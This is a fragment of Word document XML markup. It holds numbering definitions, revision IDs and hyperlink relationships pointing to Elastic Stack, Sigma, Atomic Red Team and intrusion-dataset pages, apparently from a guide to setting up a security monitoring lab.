            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62EE3EE1" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004816BF">
              <w:t>TheHive</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004816BF">
              <w:t>, Suricata, Zeek</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BBD8C45" w14:textId="77777777" w:rsidR="00E51843" w:rsidRDefault="00E51843"/>
    <w:sectPr w:rsidR="00E5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27C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26C8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62A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7048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64705"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9666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74452"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="96CA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368C8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="28F0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3534EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F468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D0639C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="25C2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466261"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F96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7B3FB8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="76CC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D812C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0C8A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0A181C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="55E46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EF2FCC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B11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834460"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D490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A3111"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="334AFC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9C5CBF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC7A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FE7444"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4716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AF0953"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF1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063445"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F9B6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18796A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="691E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E07232"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="50E4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986DFD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="816E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FA153B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3790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B62DD2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2F04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FD6B5F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BA52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010A8D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DCCE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9A05C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="537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AF50AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F59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6070E1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7F2E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BEE3C4A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2AAC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51763C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="442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74347D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF0C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764B0F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A6FE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7630AF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B6A6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85499A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B0BC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7704A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4802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0B3D94"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="343E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927D22"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA46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A00A70"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="166E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D03155"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8404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D8659F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AADC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9F610E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4E46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3E6D57"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D6C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DD4D5B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B528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802369"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="368E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1E5641"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="883260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A01DFF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CD88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4D07BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="879000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092E78"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FDFE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461689"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="770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D721B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DC5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EB643D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="91EA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055594"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B7BC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3F0F21"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="494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4268B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E0E6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AA1C6E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A83C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C100E0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="641C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4416B1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7014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522FB0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="777A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CD3C46"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2058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963AFA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9A76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12388F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="14B0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183440"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9202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61229D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="272E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0A5887"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F594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7C726D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="448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DE54DF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8FE0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F36D77"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5EC6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7378FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5E04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8224BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F526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44A0B9F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E69C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A41BDA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6450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C433F8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C652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6D22E9B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7BCA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D808D5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="29EC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BC171E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F46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672EA9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B90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7D0446"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4BD8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802677"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A71E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C1C2086"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F5F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544C6B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F4EC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F97E25"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="25D8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9500D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0EE2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463CA3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1CA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3F5161"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9C1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3EC4BEC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A480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4743E9A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B1FE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8D64D4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B192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510085F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C9C6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412710"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF0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C83A03"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8360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C64671"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4338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E62720"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="757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C3F2EAF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="577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0A18D0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1798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8338CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="57C4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8523A2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7ADE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45734BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8584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CC28EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E74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022503"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="310851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AA05746"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D46C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B41689B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B87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4D46D2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="33BC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EC00CFC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="94CA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462452"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="234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5C763C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7DA8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01E7869"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2CE0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05F45A9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="696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DC76B1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="49DC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F8120B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C58A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27845A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9AD2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2E10587"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B38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A724BE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8C4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FA4BC0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A182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CB149E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="591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6DA6959"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8064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DF0047"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="88E4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A557126"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="06821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A8040B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6494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C870ACD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2172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D255954"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="456C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D8117A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E37A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485737">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="129709368">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="608195831">
    <w:abstractNumId w:val="86"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="726993227">
    <w:abstractNumId w:val="94"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1054694644">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="43676695">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1217936970">
    <w:abstractNumId w:val="97"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1253852070">
    <w:abstractNumId w:val="106"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="12075419">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="690884876">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="195510557">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1862236290">
    <w:abstractNumId w:val="69"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1417168283">
    <w:abstractNumId w:val="87"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1437217675">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1610117205">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1006982382">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="562759509">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="700666086">
    <w:abstractNumId w:val="118"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1466966661">
    <w:abstractNumId w:val="92"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="35130001">
    <w:abstractNumId w:val="113"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="153766260">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1272711603">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1137644777">
    <w:abstractNumId w:val="79"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1659920009">
    <w:abstractNumId w:val="93"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1284002864">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="850142401">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="2106414525">
    <w:abstractNumId w:val="74"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1552839130">
    <w:abstractNumId w:val="117"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="509680395">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1990865122">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="2021350909">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1201045211">
    <w:abstractNumId w:val="111"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1924751923">
    <w:abstractNumId w:val="115"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="156270367">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="172109472">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1284775176">
    <w:abstractNumId w:val="119"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="223415313">
    <w:abstractNumId w:val="100"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="200019799">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="109205608">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="609826414">
    <w:abstractNumId w:val="90"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="844514575">
    <w:abstractNumId w:val="85"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="11733709">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="1423381720">
    <w:abstractNumId w:val="120"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="128666895">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="460196107">
    <w:abstractNumId w:val="110"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="121047735">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="722095405">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="31468558">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="83233861">
    <w:abstractNumId w:val="70"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="89355012">
    <w:abstractNumId w:val="95"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="324939850">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="333650615">
    <w:abstractNumId w:val="84"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="770508357">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="1698964498">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="55" w16cid:durableId="1308975666">
    <w:abstractNumId w:val="116"/>
  </w:num>
  <w:num w:numId="56" w16cid:durableId="1748913884">
    <w:abstractNumId w:val="98"/>
  </w:num>
  <w:num w:numId="57" w16cid:durableId="1259676718">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="1739284017">
    <w:abstractNumId w:val="64"/>
  </w:num>
  <w:num w:numId="59" w16cid:durableId="1696073191">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="60" w16cid:durableId="1747535043">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="61" w16cid:durableId="1175075353">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="62" w16cid:durableId="1561362118">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="63" w16cid:durableId="589198294">
    <w:abstractNumId w:val="81"/>
  </w:num>
  <w:num w:numId="64" w16cid:durableId="758909214">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="65" w16cid:durableId="1428425978">
    <w:abstractNumId w:val="105"/>
  </w:num>
  <w:num w:numId="66" w16cid:durableId="1539506904">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="67" w16cid:durableId="1413160945">
    <w:abstractNumId w:val="83"/>
  </w:num>
  <w:num w:numId="68" w16cid:durableId="1948123601">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="69" w16cid:durableId="639769723">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="70" w16cid:durableId="1333143340">
    <w:abstractNumId w:val="73"/>
  </w:num>
  <w:num w:numId="71" w16cid:durableId="1835534569">
    <w:abstractNumId w:val="67"/>
  </w:num>
  <w:num w:numId="72" w16cid:durableId="36859802">
    <w:abstractNumId w:val="107"/>
  </w:num>
  <w:num w:numId="73" w16cid:durableId="1169636268">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="74" w16cid:durableId="1444955543">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="75" w16cid:durableId="658577937">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="76" w16cid:durableId="194124546">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="77" w16cid:durableId="65618235">
    <w:abstractNumId w:val="82"/>
  </w:num>
  <w:num w:numId="78" w16cid:durableId="1313681519">
    <w:abstractNumId w:val="71"/>
  </w:num>
  <w:num w:numId="79" w16cid:durableId="2060788092">
    <w:abstractNumId w:val="76"/>
  </w:num>
  <w:num w:numId="80" w16cid:durableId="279455114">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="81" w16cid:durableId="1477334664">
    <w:abstractNumId w:val="77"/>
  </w:num>
  <w:num w:numId="82" w16cid:durableId="1408571596">
    <w:abstractNumId w:val="88"/>
  </w:num>
  <w:num w:numId="83" w16cid:durableId="612903964">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="84" w16cid:durableId="1470585344">
    <w:abstractNumId w:val="114"/>
  </w:num>
  <w:num w:numId="85" w16cid:durableId="233128590">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="86" w16cid:durableId="1488280990">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="87" w16cid:durableId="661934891">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="88" w16cid:durableId="29915308">
    <w:abstractNumId w:val="99"/>
  </w:num>
  <w:num w:numId="89" w16cid:durableId="74665381">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="90" w16cid:durableId="1217743344">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="91" w16cid:durableId="575289973">
    <w:abstractNumId w:val="103"/>
  </w:num>
  <w:num w:numId="92" w16cid:durableId="188371740">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="93" w16cid:durableId="1880360927">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="94" w16cid:durableId="101196414">
    <w:abstractNumId w:val="102"/>
  </w:num>
  <w:num w:numId="95" w16cid:durableId="2053653357">
    <w:abstractNumId w:val="89"/>
  </w:num>
  <w:num w:numId="96" w16cid:durableId="1504971119">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="97" w16cid:durableId="453327755">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="98" w16cid:durableId="732001518">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="99" w16cid:durableId="186527576">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="100" w16cid:durableId="2095322277">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="101" w16cid:durableId="856887359">
    <w:abstractNumId w:val="68"/>
  </w:num>
  <w:num w:numId="102" w16cid:durableId="1479881234">
    <w:abstractNumId w:val="96"/>
  </w:num>
  <w:num w:numId="103" w16cid:durableId="887186390">
    <w:abstractNumId w:val="75"/>
  </w:num>
  <w:num w:numId="104" w16cid:durableId="513347728">
    <w:abstractNumId w:val="66"/>
  </w:num>
  <w:num w:numId="105" w16cid:durableId="2069724658">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="106" w16cid:durableId="47724873">
    <w:abstractNumId w:val="104"/>
  </w:num>
  <w:num w:numId="107" w16cid:durableId="1401058472">
    <w:abstractNumId w:val="109"/>
  </w:num>
  <w:num w:numId="108" w16cid:durableId="991301002">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="109" w16cid:durableId="1970085247">
    <w:abstractNumId w:val="101"/>
  </w:num>
  <w:num w:numId="110" w16cid:durableId="953291526">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="111" w16cid:durableId="1210416075">
    <w:abstractNumId w:val="112"/>
  </w:num>
  <w:num w:numId="112" w16cid:durableId="208299115">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="113" w16cid:durableId="202984060">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="114" w16cid:durableId="1604604587">
    <w:abstractNumId w:val="72"/>
  </w:num>
  <w:num w:numId="115" w16cid:durableId="940452097">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="116" w16cid:durableId="1060515501">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="117" w16cid:durableId="1533348482">
    <w:abstractNumId w:val="91"/>
  </w:num>
  <w:num w:numId="118" w16cid:durableId="1689406042">
    <w:abstractNumId w:val="80"/>
  </w:num>
  <w:num w:numId="119" w16cid:durableId="1025325749">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="120" w16cid:durableId="1464688651">
    <w:abstractNumId w:val="108"/>
  </w:num>
  <w:num w:numId="121" w16cid:durableId="454063508">
    <w:abstractNumId w:val="78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43"/>
    <w:rsid w:val="001F725C"/>
    <w:rsid w:val="002965EA"/>
    <w:rsid w:val="00381682"/>
    <w:rsid w:val="004536D2"/>
    <w:rsid w:val="00463952"/>
    <w:rsid w:val="004816BF"/>
    <w:rsid w:val="00643F83"/>
    <w:rsid w:val="00645538"/>
    <w:rsid w:val="00863600"/>
    <w:rsid w:val="008D3172"/>
    <w:rsid w:val="009467A6"/>
    <w:rsid w:val="00D15DED"/>
    <w:rsid w:val="00DA611A"/>
    <w:rsid w:val="00DC10D8"/>
    <w:rsid w:val="00E5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D1AC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{82E246C0-8715-47B5-9C73-F9D36288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8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6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esearch.unsw.edu.au/projects/unsw-nb15-dataset?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/redcanaryco/atomic-red-team?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-getting-started.html" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elasticsearch/reference/current/index-lifecycle-management.html" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/beats/libbeat/current/beats-reference.html" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/kibana/current/security-settings-kb.html" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/beats/libbeat/current/beats-reference.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/redcanaryco/atomic-red-team?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/kibana/current/index.html" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/beats/packetbeat/current/packetbeat-installation.html" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://grokdebugger.com/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/security/current/prebuilt-rules.html" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SigmaHQ/sigma?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elastic-stack-get-started/current/security-get-started.html" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/elastic/detection-rules?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/kibana/current/getting-started.html" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elasticsearch/reference/current/modules-node.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kaggle.com/datasets/mrwellsdavid/unsw-nb15?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/splunk/attack_data" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.atomicredteam.io/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/kibana/current/deb.html" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/beats/filebeat/current/faq.html" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.atomicredteam.io/?utm_source=chatgpt.com" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elasticsearch/reference/current/snapshots-take-snapshot.html" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/elasticsearch/reference/current/snapshots.html" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 